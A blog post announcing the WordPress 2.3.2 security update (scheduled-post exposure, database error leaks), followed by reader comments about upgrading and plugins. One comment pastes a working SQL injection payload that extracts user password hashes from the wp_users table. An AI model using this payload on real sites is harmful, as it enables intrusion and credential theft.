WordPress has just released an urgent security update for the 2.3 series. If you’re blog is powered by WordPress 2.3, then you should upgrade to this latest version right away. The upgrade fixes a security bug that allows people to view your timestamped posts. You may have seen a few posts around the blogosphere showing how to see what Shoemoney is going to post tomorrow. Well, once Shoe upgrades his WordPress, you won’t be able to do that anymore.
WordPress 2.3.2 also suppresses some error messages that can give away information about your database table structure, and it limits and stops some information leaks in the XML-RPC and APP implementations. There’s also a bonus that allows you to define a custom DB error page. See the full list of changes here.
This is not a major release and as such it will not change your DB structure. Upgrading should be as easy as uploading and replacing the old WordPress files. That’s what I did anyway. You can see a full list of bug fixes here.
WordPress Never Stop !!
Well, at least they do improve and serve us with a more secure platform rather than just ignore the bugs.
I know that if you know the URL of a post you can view it before it goes live but I didn’t know there was another way.
I better go update now.
Does anybody else know how? It could be cool as a little test.
I noticed the time stamp issue and thought that it shouldn’t work that way, but then just dismissed it. I guess that for the A-list bloggers, it could be detrimental for others to see your post before it’s officially published.
Thanks! I probably wouldn’t have updated until much later if it wasn’t for this post :)
Thanks, I’ll be upgrading my blog shortly. :)
Good catch and good explanation, John. Funny, I took more than an hour off to drink coffee and work down the list of un-reads in my feedreader this morning and I didn’t come across anyone else mentioning this until I got to you (saving the best ’til last ;-)).
I highly recommend techie-buzz’s automatic update plug-in. Makes these upgrades a snap and also lets you do a backup as part of the process very painlessly. It’s available at:
http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin.html
for those who hate manual piece by piece updating.
Thanks for the info John… and thanks for the link to the WordPress plugin Dave, it’s gonna make updating all my blogs that much faster! :)
Good work Mr Chow. I just read it here first! The automatic updater you turned me on to works a treat as well. Cheers! :)
Yes, I saw on my blog Dashboard about the New Version Update. I didn’t update yet, I wanna do this soon :)
Darn! If only I knew about this earlier, so I could have sneaked into posts :)
-Mike
Damn, I’ve like 6 blogs that will need updating. Thanks for the heads up.
Use the plugin... it will be easier and fun :)
No one can read my timestamped posts :)
goooooo wordpress!
Thanks a lot for the heads up!
For people who want to have full security on their work or personal details, upgrading would be a good idea. Thanks for showing us John.
Thanks for the heads up
Newbie question. I’ve never done this before. Will I lose all of the tweaks, such as custom header, installed widgets, and other stuff that I’ve done?
If so, is there an easy way to get everything back? I just don’t want to end up back at the basic Kubrick design. Thanks a lot.
No, you will not lose those. Make a backup anyway before upgrading.
Will do. Thank you.
I’m still updating. Heck, I never knew you could see what Shoe was posting, before he posted it.
Thx for the tip.
WordPress just continues to update and give the best to its users.
Thanks for the heads up on this John.
Thank you for the info about the update. Security is the first. :)
After the upgrade several of my plug-ins stopped working. Specifically, Brian’s Threaded Comments, and WP-Cache. Anyone else running into this? My comments look terrible now.
I know what I did find, my theme no longer displays correctly, I had to go back to 2.3.1 to get it to work properly again.
Here is the technical reason documentation.
=== WordPress Charset SQL Injection Vulnerability ===
exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
I don’t know if I’m going to upgrade right away or not. Decisions, decisions.
Thanks for reporting it, John. My blog jumped from 50 to 200 subscribers today. :)
For many, they’d rather people read their timestamped posts since it gives them one more visitor :)
“If you’re blog is powered by WordPress”
No, I am not a blog.